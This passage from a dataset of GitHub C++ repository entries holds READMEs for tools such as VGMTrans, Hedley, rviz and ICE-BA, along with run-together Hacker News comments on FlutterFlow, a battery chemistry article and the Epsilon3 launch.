account to test it out. My only complaint so far is the assumed integration with Firebase, perhaps this is because it's Flutter and they use everything google? Is there a way to integrate other DBs? I see the API feature is only available for premium plans.Congrats on your launch. Have you taken any steps to help app developers using this tool make their apps accessible with a screen reader, e.g. prompting them to add text labels to image buttons?It would be great if this tool also had better theming options. Perhaps more pre-configured themes that auto apply. I feel like you could take all these pallets and just make them auto-selectable themes. https://material.io/design/color/the-color-system.html#color...Where can I find the source code for flutterflow?Looks great. But is it restricted to building mobile apps only or can it also help you build web apps in Flutter?Looks great! Reminds me very much of AppGyver, which is a tool I've been using in few client projects. It uses react native under the hood, allowing for example creating logic using either the node-based logic builder or plain JavaScript. Interested to hear where do you see your advantage over AppGyver and similar tools?One pain point of mine in visual app builders is the not being able to search the \"code\", for example when I've built a logic for fetching and mutating data in one view and now need to change it but can't remember where it is. Have you come across this problem and have you already solved it/have a plan for solving it?Does this provide access to the Bluetooth API?This looks super exciting. As an Android developer who has not yet built a Flutter app, I'm intrigued if this can be a stepping stone to ramping up on flutter.I looked over the video. It is nice to see a compressed video, but it was still hard to understand what to pay attention to inside a 20 minute video. It would be great if you added callouts to the important moments so people could easily jump to the important items.Is Firebase a requirement? I tried to create a sample app and was immediately told I needed to setup Firebase. I didn't see a way to skip that step, but perhaps it is because I used a sample template? I would prefer to use GraphQL as a backend, and am not sure if the full Firebase stack (auth, storage, realtime) are used, or if you can swap pieces in and out when desired.Congratulations on your launch!Absolutely fantastic. I\u2019m a big Flutter fan and I figured it was just a matter of time before someone conjured this up. Well done lads.congrats Alex and Abel! was wowed when I first checked you guys out coming out of YC, and have been absolutely nothing but impressed by your product momentum and marketing capability throughout 2021. Really excited for you and going to try building along to see whats new!This looks awesome, but sadly, your education plan is practically unusable for most of Latin America, where .edu (or .ac) email addresses are very rare. I'm a college student and I can't apply because my university uses our country TLD.I hope you can reconsider this policy and begin using university domain lists [1] instead of just checking for TLDs.[1]: See https://github.com/Hipo/university-domains-list, by example.I've been using this myself and really enjoying it.I haven't been focusing too much on building a full app via this, but it is fantastic for building a mock up of what something would look like in Flutter.It's easier to use and looks more like an app than anything you would build in Balsamic or Figma, since it is basically a drag n' drop Flutter UX. At the end, you get the code used for building it which is awesome for moving from mockup -> the actual app.Congrats on the launch. Ive switched from webflow to flutter for the website Im building (for my startup project). Flutter is awesome (though I still \"wonder what the result is gonna be\" but way less than with css) and I believe youre betting on a great horse. I dont know if youve noticed but when you browse a flutter website with chrome on a desktop computer, it offers you to install the app natively! Like you said: super cross-platform. Initially I was using webflow because I dont understand a thing to css and I find the paradigm sux overall. But then as a consequence webflow isnt my taste as well. I was building my android app with flutter and I thought I should just do the website with it as well. Best of luck, I think youre a hot startup. Ps: maybe you should consider to market it for website as well, not only apps (sry if you do already). Im no expert to say it will be convincing for this end but Im never going back to html5 and its derivative frameworks lemme tell you that :)Great job!Be happy if you can satisfy my technical curiosity:- Do you render native flutter web view when in WYSIWIG editing mode? If so - how do you support drag-n-drop over it? If not - how do you make it look the same as web preview app?- I don't see in free plan any data/network related source code \u2014 is it hidden in your libs or all the machinery is transparent in the source code (as long as i download it)?The chemist part of my brain is immediately nervous seeing Na metal + Cl2 gas anywhere near each otherWhile it was interesting at first, by peppering inaccuracies or at best oversimplifications, it makes me doubt the veracity of the rest of the content. For example:>Non-rechargeable batteries have no such luck. Once drained, their chemistry cannot be restored.Rechargeable batteries have limited cycles due to problems, mainly solidification or breakdown of electrolytes that prevent restoration, but there are others like mechanical effects.Most \"Non-rechargeable batteries\" can actually be restored as well in the same sense of those labeled as rechargeable ones, but usually have a much lower cycle count due to these effects. For example can usually get a few cycles from your alkaline batteries, as long as you are trickle charging them since they don't usually have good venting.Novel chemistries in nano scale in the lab are fun to puzzle about, but pure silicon anode Li-ion batteries really are coming in the next six months, notably from Enovix, and will actually change things. A 2x density upgrade that's real is a whole lot more interesting than a 6x density upgrade that isn't ready for commercialization.\"sodium chloride (Na/Cl2)\"I'm not chemist, but if I recall correctly, sodium chloride is NaCl, not NaCl2, ie common kitchen salt.Dear battery technology claimant,Thank you for your submission of proposed new revolutionary battery technology. Your new technology claims to be superior to existing lithium-ion technology and is just around the corner from taking over the world. Unfortunately your technology will likely fail, because:[ ] it is impractical to manufacture at scale.[ ] it will be too expensive for users.[ ] it suffers from too few recharge cycles.[ ] it is incapable of delivering current at sufficient levels.[ ] it lacks thermal stability at low or high temperatures.[ ] it lacks the energy density to make it sufficiently portable.[ ] it has too short of a lifetime.[ ] its charge rate is too slow.[ ] its materials are too toxic.[ ] it is too likely to catch fire or explode.[ ] it is too minimal of a step forward for anybody to care.[ ] this was already done 20 years ago and didn't work then.[ ] by this time it ships li-ion advances will match it.[ ] your claims are lies.credit: https://news.ycombinator.com/item?id=26633630Really interesting to compare with the publication itself:https://www.nature.com/articles/s41586-021-03757-zThey don't mention six times more charge anywhere. Rather, the novelty is that it they make a discharge reaction re-chargeable for the first time. The final paragraph hints at a rapid drop-off after the first discharge:> The battery delivered about 3,309 mAh first discharge capacity and was cyclable at 500\u20131,200 mAh.One can see a benefit in that a previous single-use battery could be cycled (e.g. a hearing aid). The press release claim is such a stretch as to be essentially a lie:> a high-performance rechargeable battery that could enable cellphones to be charged only once a week instead of daily and electric vehicles that can travel six times farther\"new battery tech\" and \"fusion is 10 years away\" - name better duoMore features to add to the upcoming superbattery to end all battery problems. If we get all the battery innovations promised in the past 30 years, our energy problems are solved.For how important it is to modern society, the somewhat stagnating state of battery technology in comparison is baffling. Obviously there is a lot of $ thrown on this problem (securing the constant flow of such hopeful articles in the since the 2000s) but per feeling most of the gains since the Nokia days comes from improving HW/SW efficiency.If Lithium is dangerous, Chlorine is taking it up a notch. As far as I understand it basically sets anything it touches on fire, and at high concentrations is deadly within a few breaths.https://en.m.wikipedia.org/wiki/Sodium-ion_batteryRule #1 for any battery article: if Ctrl+F \"patent\" doesn't find anything, close the page without reading it. If it's not practical enough to patent you will never see it in your hands.I'd rather have another gas engine from China now than this shit.Yet again, the useless milliamp-hours per gram for one component of a cell instead of actual energy per unit mass for a whole cell. What is the Watt-hours per kilogram????Congrats! Great to see YC supporting more software companies that are working towards finally bringing the \"boring\" parts of the sector into the 21st century.If you're interested in exploring the idea of supply chain integration, I'd love to chat. We're an ESA-backed, online marketplace for the space sector [1], and we've built a few integrations already to bring tools and data together for engineers.[1] https://satsearch.comExcited to be using this product for ensuring clearly documented and easy to make test procedures for our propulsion testing, and eventually for our satellite operations. Keep up the good work Epsilon3 and I look forward to becoming a hardcore power user!Laura, congratulations. Does it support acronyms? :)Anyone interested should sign up for the changelog emails. It's only 1-2 emails a month and shows how much progress Laura and her team are making.Very cool domain and background.They are the real deal! Awesome team and product.Is your name a Babylon 5 Reference?https://babylon5.fandom.com/wiki/Epsilon_IIIInteresting. This sounds like a good fit for CRDTs somewhat, though a centralized architecture might offer more robustness guarantees. On the other hand, it would be quite easy to display sync status as part of the UI.So excited to be part of Epsilon3 and helping so many awesome companies with their testing and operations.I hope everyone saw the recent epic Blue Origin and Virgin Galactic flights. Those are just the first small step in what's to be a very exciting future. Epsilon3 wants to eventually help so many more people go to space. Now that we\u2019ve had two billionaires go up to space, maybe someone in the HN community can be next?Is the any planned integration with requirement tracking software such as DOORS? If it were possible to flow test results back into the requirement specification systems it could seriously save a lot of time and money.Also, for commenting on procedure steps are there any additional tools available for the text formatting? We find we have to do a lot of red lining and colour coding as things progress to track deviations in a simple way for customers and PA to find.Congrats, anything related to space sounds super cool :)Love this! It's certainly surprising that something like this doesn't exist for the space industry yet (and other industries that do complex texting and operations). Glad to see someone working to fill that gap especially as the commercial space industry starts to blossom. Couple of thoughts/questions:1.) How do you convince space orgs that using a third-party SaaS offering is a better approach than building it in-house? Especially as part of the ERP the org may be using already?2.) Does Epsilon3 support scripted procedures? What language(s) does it support?3.) Any thoughts on a ChatOps like interface (e.g. Slack)?Would you say your software is appropriate for aerospace manufacturing and quality management system data collection?I don't understand yet the pain being adressed. If today it can be solved with pen and paper or Word, it looks to me that realtime sync or data visualization were not a must (disasters seem to be avoided today just as well). Nice to have, without doubt, but not a must. So your software makes it a nice experience for everybody involved, right?Oh, it\u2019s llcrabtree! We didn\u2019t cross paths but I\u2019ve seen your name all over Confluence. :) (I was on the training team after you left.) This is gonna be rad. Can\u2019t wait to see where it goes.Really excited to be part of this team! Laura was talking yesterday about tearing up at after the Blue Origin launch, not just because it's amazing to send people to space, but because it requires the work and communication of thousands of people to take them up and bring them home safe. We're excited to build tools to enable all of the hard work that leads up to a successful launch!First, congrats on launching.\nSecond, \"AWS GovCloud for ITAR compliance,\" can the USG access my data (EU company) then?Excited for this launch! Our customers are doing literal rocket science and every day is an amazing opportunity for us to build the supporting technology they need to do amazing things.Rocket science is hard, but running your operations shouldn't be! At Epsilon3 we're solving the software challenges of complex operations so you can get back to what you do best - space!Wow. This is enormously impressive. I currently work for a small startup based out of Denmark in the renewable energies space (wind turbines) developing web based tools to assist in our ML operations.With a lifelong obsession with cosmology and astronomy, and perhaps even more applicably relevant; our own human advancement to and into the stars, I have increasingly become more and more inclined to the notion of further developing my current skillset with the eventual goal of transitioning to the space industry.My recent experience and exposure to renewable energies has given me massive insight to just how important companies like you guys are to furthering humanity\u2019s progress. My question to you all regarding your technology, is how you manage what I imagine to be extraordinarily large, rich, and complex datasets that must vary between use cases (you mention hotels, debris removal, etc.). The data between these use cases must vary in structure\u2014 how is it normalized/standardized to work with your pipeline(s)? The commonality I see (as a fairly novice layman in terms of space technology) is of the rocket propulsion, orbiting, and payload delivery kind, but I\u2019m sure the data it is far more nuanced and goes far beyond that.Furthermore, is any sort of machine learning applied on your side, perhaps in some sort of statistical analysis / metric reporting?I\u2019m going to definitely keep an eye on you all at Epsilon3. Perhaps you will be looking for more engineers with web dev, data, ML, and cyber/info security experience in the future!Huge props. I can tell there is an extraordinary amount of innovation involved with this venture. Excited to see where you all go with this =)Extremely excited for this launch! We have amazing companies doing some really cool stuff in the space sector! Cannot wait to support all the amazing missions with Epsilon3!This is awesome and made my day knowing that the space industry is big enough to support a startup building this kind of ops tooling.You said \u201cyou don\u2019t hear about most of those on the news\u201d and you\u2019re right - most of the customer logos on your website I\u2019d never heard of - is there a website / twitter / ? that you rely on for daily coverage?I would love to build a better view of the industry, players, priorities.Looks very interesting. I surfed around your site and watched the video. So how about nonconformance processing? Do you have workflows for that, or is that where something like JIRA comes in?Also, have you utilized anything like the S1000D aerospace data schema with this tool, or are you rolling your own?Congrulations on the launch, it sounds awesome. This is one of the companies where I would love to work. Are you taking remote candidates?I had no idea this niche existed. However, no sarcasm here at all, but do people in the space industry read HN and Product Hunt at all?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vgmtrans/vgmtrans", "link": "https://github.com/vgmtrans/vgmtrans", "tags": ["instrument-formats", "music-files", "midi", "soundfont2", "dls", "vgmusic"], "stars": 657, "description": "VGMTrans - a tool to convert proprietary, sequenced videogame music to industry-standard formats", "lang": "C++", "repo_lang": "", "readme": "VGMTrans - Video Game Music Translator\r\n======================================\r\n| Platform | Status | Build available |\r\n| :-: | :-: | :-: |\r\n| Windows | [![Build status](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) | [Yes](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) |\r\n| macOS | [![Build status](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) | [DMG (not signed)](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) |\r\n| Linux | [![Build status](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) | [AppImage](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) |\r\n| FreeBSD | [![Build Status](https://api.cirrus-ci.com/github/vgmtrans/vgmtrans.svg)](https://cirrus-ci.com/github/vgmtrans/vgmtrans) | No |\r\n| Windows (legacy, 32-bit) | [![Build status](https://ci.appveyor.com/api/projects/status/ns62qg09yn5kmf18/branch/master?svg=true)](https://ci.appveyor.com/project/sykhro/vgmtrans-ci/branch/master) | [Yes](https://ci.appveyor.com/project/sykhro/vgmtrans-ci/branch/master/artifacts) |\r\n\r\nVGMTrans converts a music files used in console video games into standard midi and dls/sf2 files. It also plays these files in-program. The following formats are supported with varying degrees of accuracy:\r\n\r\n- Sony's PS2 sequence and instrument formats (.bq, .hd, .bd)\r\n- Squaresoft's PS2 sequence and instrument formats (.bgm, .wd)\r\n- Nintendo's Nintendo DS sequence and instrument formats (SDAT)\r\n- Late versions of Squaresoft's PS1 format known as AKAO - sequences and instruments\r\n- Sony's PS1 sequence and instrument formats (.seq, .vab)\r\n- Heartbeat's PS1 sequence format used in PS1 Dragon Quest games (.seqq)\r\n- Tamsoft's PS1 sequence and instrument formats (.tsq, .tvb)\r\n- Capcom's QSound sequence and instrument formats used in CPS1/CPS2 arcade games\r\n- Squaresoft's PS1 format used in certain PS1 games like Final Fantasy Tactics (smds/dwds)\r\n- Konami's PS1 sequence format known as KDT1\r\n- Nintendo's Gameboy Advance sequence format\r\n- Nintendo's SNES sequence and instrument format known as N-SPC (.spc)\r\n- Squaresoft's SNES sequence and instrument format (AKAO/SUZUKI/Itikiti) (.spc)\r\n- Capcom's SNES sequence and instrument format (.spc)\r\n- Konami's SNES sequence and instrument format (.spc)\r\n- Hudson's SNES sequence and instrument format (.spc)\r\n- Rare's SNES sequence and instrument format (.spc)\r\n- Heartbeat's SNES sequence and instrument format used in SNES Dragon Quest VI and III (.spc)\r\n- Akihiko Mori's SNES sequence and instrument format (.spc)\r\n- Pandora Box's SNES sequence and instrument format (.spc)\r\n- Graphic Research's SNES sequence and instrument format (.spc)\r\n- Chunsoft's SNES sequence and instrument format (.spc)\r\n- Compile's SNES sequence and instrument format (.spc)\r\n- Namco's SNES sequence and instrument format (.spc)\r\n- Prism Kikaku's SNES sequence and instrument format (.spc)\r\n\r\nThe source code includes preliminary work on additional formats. \r\n\r\nThis software is released under the zlib/libpng License. See LICENSE.txt.\r\n\r\nHow to use it\r\n-------------\r\n\r\nTo load a file, drag and drop the file into the application window. The program will scan any file for contained music files. It knows how to unpack psf, psf2 and certain zipped mame rom sets as specified in the mame_roms.xml file, though this last feature is fairly undeveloped. For example, drag on an NDS rom file and it will detect SDAT files and their contents.\r\n\r\nOnce loaded, double-clicking a file listed under \"Detected Music Files\" will bring up a color-coded hexadecimal display of the file with a break-down of each format element. Click the hexadecimal to highlight an element and see more information. Right click a detected file to bring up save options. To remove files from the \"Detected Music Files\" or \"Scanned Files\" list, highlight the files and press the delete key.\r\n\r\nThe \"Collections\" window displays file groupings that the software was able to infer. A sequence file will be paired with one or more instrument sets and/or sample collections. A collection can be played by highlighting it and pressing the play button or spacebar.\r\n\r\nHow to compile it\r\n-----------------\r\n\r\nPlease refer to [the wiki](https://github.com/vgmtrans/vgmtrans/wiki) for information on how to compile the two flavors of VGMTrans. \r\n\r\nContributors\r\n------------\r\n\r\n- Mike: The original author of the tool, worked on a lot of formats.\r\n- loveemu: Creator of github project, worked on bugfixes/improvements.\r\n- Sound Test: 774: Anonymous Japanese guy in 2ch BBS, worked on the HOSA format, analyzing the TriAcePS1 format and such.\r\n\r\n### Special Thanks\r\n\r\n- Bregalad: Author of [GBAMusRiper](http://www.romhacking.net/utilities/881/), great reference of MP2k interpretation.\r\n- Nisto: Author of [kdt-tool](https://github.com/Nisto/kdt-tool), thank you for your approval of porting to VGMTrans.\r\n- [Gnilda](https://twitter.com/god_gnilda): for his/her dedicated research of SNES AKAO format. \r\n- [@brr890](https://twitter.com/brr890) and [@tssf](https://twitter.com/tssf): Contributed a lot of hints on PS1 AKAO format.\r\n\r\nContact\r\n-------\r\n\r\nIf you enjoy the software, or have any questions please contact the development team.\r\n\r\n\r\n", "readme_type": "markdown", "hn_comments": "I recently completed a big interntionalization/localization project at my day job that took weeks of development time and coordination across the company. I wanted to find a better way to approach this problem and realized it's possible to do with javascript on the client side.Now you can translate your website to 100+ local languages in just a few minutes by adding a javascript snippet to your site. This is meant for small to medium sized businesses that can't afford the weeks of development time to translate their site for international customers.Let me know what you think! All feedback is appreciated.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "FengJungle/DesignPattern", "link": "https://github.com/FengJungle/DesignPattern", "tags": ["designpattern", "design-patterns", "cpp"], "stars": 657, "description": "Design pattern demo code", "lang": "C++", "repo_lang": "", "readme": "#DesignPattern\nJungle design pattern series\n\n## grateful\nThanks to @ichdream for his contribution to this project, and welcome and support more coders to make modifications and corrections\n\n## correction\n* 2021/10/28: GB2312 --> UTF-8\n* 2021/09/07: merge @ichdream pull request, use smart pointer to manage heap objects, introduce makefile management project, modify file encoding format\n* 2021/04/04: Add a virtual destructor to the virtual base class to avoid memory leaks\n* 2020/11/29: Fix memory leak\n*\n\n## Table of contents\n\nCode resources: https://github.com/FengJungle/DesignPattern\n\n01. Design Patterns - Overview of Design Patterns\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102513485\n\n02. Design Patterns (2) - Introduction to UML Class Diagrams\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102576624\n\n03. Design Patterns (3) - Object-Oriented Design Principles\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102578436\n\n04. Design pattern (4) - simple factory pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102598181\n\n05. Design Pattern (5) - Factory Method Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102616501\n\n06. Design Patterns (6) - Abstract Factory Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102618384\n\n07. Design mode (7) - builder mode\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102635881\n\n08. Design Patterns (8) - Prototype Patterns\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102642682\n\n09. Design pattern (9) - singleton pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102649056\n\n10. Design pattern (10) - adapter pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102656617\n\n11. Design mode (eleven) - bridge mode\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102694306\n\n12. Design Patterns (12) - Combination Patterns\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102712738\n\n13. Design mode (thirteen) - decoration mode\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102733023\n\n14. Design mode (fourteen) - Appearance mode\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102752643\n\n15. Design Patterns (15) - Flyweight Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102763849\n\n16. Design Patterns (16) - Proxy Patterns\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102772697\n\n17. Design Patterns (Seventeen) - Chain of Responsibility Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102790445\n\n18. Design pattern (eighteen) - command pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102810123\n\n19. Design Patterns (19) - Interpreter Patterns\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102864850\n\n20. Design pattern (twenty) - iterator pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102879383\n\n21. Design pattern (21) - Intermediary pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102885567\n\n22. Design Patterns (22) - Memo Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102907007\n\n23. Design Patterns (23) - Observer Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102927937\n\n24. Design Patterns (24) - State Patterns\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102966121\n\n25. Design Patterns (25) - Strategy Patterns\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102984862\n\n26. Design Patterns (26) - Template Method Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102994585\n\n## other\n\n27. So many design patterns! What will the interviewer ask?\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/120557373\n\n28. Highlights: The test points of the singleton mode in the interview! (C++ version)\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/120591638\n\n29. new can also create objects, why do we need factory mode?\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/120754301\n\n30. Design Patterns in Qt\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/120936720\n\n31. PImpl mode\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/123150564\n\n32. Ah, how to follow the \"low coupling\" design principle?\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/123160949", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nemequ/hedley", "link": "https://github.com/nemequ/hedley", "tags": [], "stars": 657, "description": "A C/C++ header to help move #ifdefs out of your code", "lang": "C++", "repo_lang": "", "readme": "# Hedley\n\n## Documentation\n\nFor documentation, see [https://nemequ.github.io/hedley/](https://nemequ.github.io/hedley/).\nThere is an easy-to-read user guide and full API documentation.\n\n## Brief Description\n\nHedley is C/C++ a header file designed to smooth over some\nplatform-specific annoyances. The idea is to get rid of a bunch of\nthe #ifdefs in your code and put them in Hedley instead or, if you\nhaven't bothered with platform-specific functionality in your code, to\nmake it easier to do so. This code can be used to improve:\n\n * Static analysis \u2014 better warnings and errors help you catch errors\n before they become a real issue.\n * Optimizations \u2014 compiler hints help speed up your code.\n * Manage public APIs\n * Visibility \u2014 keeping internal symbols private can make your\n program faster and smaller.\n * Versioning \u2014 help consumers avoid functions which are deprecated\n or too new for all the platforms they want to support.\n * C/C++ interoperability \u2014 make it easier to use code in both C and\n C++ compilers.\n* *\u2026 and more!*\n\nYou can safely use Hedley in your *public* API. If someone else\nincludes a newer version of Hedley later on, the newer Hedley will\njust redefine everything, and if someone includes an older version it\nwill simply be ignored.\n\nIt should be safe to use any of Hedley's features; if the platform\ndoesn't support the feature it will be silently ignored.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ros-visualization/rviz", "link": "https://github.com/ros-visualization/rviz", "tags": [], "stars": 656, "description": "ROS 3D Robot Visualizer", "lang": "C++", "repo_lang": "", "readme": "![rviz logo](https://raw.githubusercontent.com/ros-visualization/rviz/noetic-devel/images/splash.png)\n\n[![Format](https://github.com/ros-visualization/rviz/actions/workflows/format.yaml/badge.svg?branch=noetic-devel)](https://github.com/ros-visualization/rviz/actions/workflows/format.yaml?query=branch%3Anoetic-devel)\n[![CI](https://github.com/ros-visualization/rviz/actions/workflows/ci.yaml/badge.svg?branch=noetic-devel)](https://github.com/ros-visualization/rviz/actions/workflows/ci.yaml?query=branch%3Anoetic-devel)\n[![ROS CI](https://build.ros.org/buildStatus/icon?job=Ndev__rviz__ubuntu_focal_amd64)](https://build.ros.org/view/Ndev/job/Ndev__rviz__ubuntu_focal_amd64/)\n\nrviz is a 3D visualizer for the Robot Operating System (ROS) framework.\n\nFor more information, please see the wiki: http://wiki.ros.org/rviz\n\nMaintainers:\n- Robert Haschke (2019-)\n- William Woodall (2013-2018)\n- David Gossow (2013)\n- Dave Hershberger (2011-2013)\n- Josh Faust (2010)\n\nThis package contains Public Domain icons downloaded from http://tango.freedesktop.org/releases/.\n\nOther icons and graphics contained in this package are released into the Public Domain as well.\n\nCopyright notice for all icons and graphics in this package:\n\n```\nPublic Domain Dedication\n\nCopyright-Only Dedication (based on United States law) or Public Domain\nCertification\n\nThe person or persons who have associated work with this document (the\n\"Dedicator\" or \"Certifier\") hereby either (a) certifies that, to the best\nof his knowledge, the work of authorship identified is in the public\ndomain of the country from which the work is published, or (b)\nhereby dedicates whatever copyright the dedicators holds in the work\nof authorship identified below (the \"Work\") to the public domain. A\ncertifier, moreover, dedicates any copyright interest he may have in\nthe associated work, and for these purposes, is described as a\n\"dedicator\" below.\n\nA certifier has taken reasonable steps to verify the copyright\nstatus of this work. Certifier recognizes that his good faith efforts\nmay not shield him from liability if in fact the work certified is not\nin the public domain.\n\nDedicator makes this dedication for the benefit of the public at\nlarge and to the detriment of the Dedicator's heirs and successors.\nDedicator intends this dedication to be an overt act of relinquishment\nin perpetuity of all present and future rights under copyright law,\nwhether vested or contingent, in the Work. Dedicator understands that\nsuch relinquishment of all rights includes the relinquishment of all\nrights to enforce (by lawsuit or otherwise) those copyrights in the\nWork.\n\nDedicator recognizes that, once placed in the public domain, the Work\nmay be freely reproduced, distributed, transmitted, used, modified,\nbuilt upon, or otherwise exploited by anyone for any purpose, commercial\nor non-commercial, and in any way, including by methods that have not\nyet been invented or conceived.\n```\n\nSource: http://creativecommons.org/licenses/publicdomain/\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "baidu/ICE-BA", "link": "https://github.com/baidu/ICE-BA", "tags": [], "stars": 656, "description": null, "lang": "C++", "repo_lang": "", "readme": "# ICE-BA\n## ICE-BA: Incremental, Consistent and Efficient Bundle Adjustment for Visual-Inertial SLAM \nWe present ICE-BA, an incremental, consistent and efficient bundle adjustment for visual-inertial SLAM, which takes feature tracks, IMU measurements and optionally the loop constraints as input, performs in parallel both local BA over the sliding window and global BA over all keyframes, and outputs camera pose and updated map points for each frame in real-time. The main contributions include: \n- a new BA solver that leverages the incremental nature of SLAM measurements to achieve more than 10x efficiency compared to the state-of-the-arts. \n- a new relative marginalization algorithm that resolves the conflicts between sliding window marginalization bias and global loop closure constraints. \n\nBeside the backend solver, the library also provides an optic flow based frontend, which can be easily replaced by other more complicated frontends like ORB-SLAM2. \n\nThe original implementation of our ICE-BA is at https://github.com/ZJUCVG/EIBA, which only performs global BA and does not support IMU input. \n\n**Authors:** Haomin Liu, Mingyu Chen, Yingze Bao, Zhihao Wang \n**Related Publications:** \nHaomin Liu, Mingyu Chen, Guofeng Zhang, Hujun Bao and Yingze Bao. ICE-BA: Incremental, Consistent and Efficient Bundle Adjustment for\nVisual-Inertial SLAM. (Accepted by CVPR 2018).**[PDF](http://openaccess.thecvf.com/content_cvpr_2018/papers/Liu_ICE-BA_Incremental_Consistent_CVPR_2018_paper.pdf)**. \nHaomin Liu, Chen Li, Guojun Chen, Guofeng Zhang, Michael Kaess and Hujun Bao. Robust Keyframe-based Dense SLAM with an RGB-D Camera [J]. arXiv preprint arXiv:1711.05166, 2017. [arXiv report].**[PDF](https://arxiv.org/abs/1711.05166)**. \n\n\n## 1. License\nLicensed under the Apache License, Version 2.0. \nRefer to LISENCE for more details.\n\n## 2. Prerequisites\nWe have tested the library in **Ubuntu 14.04** and **Ubuntu 16.04**. \nThe following dependencies are needed:\n### boost\nsudo apt-get install libboost-dev libboost-thread-dev libboost-filesystem-dev \n\n### Eigen\nsudo apt-get install libeigen3-dev\n\n### Glog\nhttps://github.com/google/glog\n\n### Gflags\nhttps://github.com/gflags/gflags\n\n### OpenCV\nWe use OpenCV 3.0.0. \nhttps://opencv.org/\n\n### Yaml\nhttps://github.com/jbeder/yaml-cpp\n\n### brisk\nhttps://github.com/gwli/brisk\n\n## 3. Build\ncd ice-ba \nchmod +x build.sh \n./build.sh\n\n## 4. Run\nWe provide examples to run ice-ba with [EuRoC dataset](https://projects.asl.ethz.ch/datasets/doku.php?id=kmavvisualinertialdatasets#downloads). \n\n### run ICE-BA stereo\nRun ICE-BA in stereo mode. Please refer to scripts/run_ice_ba_stereo.sh for more details about how to run the example. \n\n### run ICE-BA monocular\nRun ICE-BA in monocular mode. Please refer to scripts/run_ice_ba_mono.sh for more details about how to run the example. \n\n### run back-end only\nFront-end results can be saved into files. Back-end only mode loads these files and runs backend only. \nPlease refer to scripts/run_backend_only.sh for more details about how to run the example. \n\n## 5. Contribution\nYou are very welcome to contribute to ICE-BA.\nBaidu requires the contributors to e-sign [CLA (Contributor License Agreement)](https://gist.github.com/tanzhongyibidu/6605bdef5f7bb03b9084dd8fed027037) before making a Pull Request. We have the CLA binding to Github so it will pop up before creating a PR.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ploopyco/classic-trackball", "link": "https://github.com/ploopyco/classic-trackball", "tags": [], "stars": 656, "description": "A trackball mouse. Mechanical files, PCBs, and firmware all included.", "lang": "C++", "repo_lang": "", "readme": "# The Ploopy Trackball\n\nBy some stroke of luck, you've made your way here. The Ploopy Trackball. Your life will never be the same.\n\nThis repository contains all of the design and production files necessary to make a Ploopy Trackball. We've also included some kick-ass documentation in the Wiki on how to get it made, assemble it, and program it.\n\nWhat are you waiting for? Your new life awaits.\n\n## QMK?!\n\nAs of November 13th, 2020, kits bought from the [Ploopy store](https://ploopy.co/product-category/trackball/classic/) come with QMK preloaded. Check out the Wiki for instructions on how to load new firmware onto your device. (It's super easy!)\n\n## Under what license is this released?\n\nThe firmware is released under GPLv3. The hardware is released under OHL CERN v1.2. Check the respective directories for full license text.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thekvs/cpp-serializers", "link": "https://github.com/thekvs/cpp-serializers", "tags": ["cpp", "serialization", "protobuf", "capn-proto", "thrift", "flatbuffers", "cereal", "performance-testing", "boost", "msgpack", "avro", "apache-avro", "c-plus-plus", "yas"], "stars": 656, "description": "Benchmark comparing various data serialization libraries (thrift, protobuf etc.) for C++", "lang": "C++", "repo_lang": "", "readme": "# About\n\nCompare various data serialization libraries for C++.\n\n* 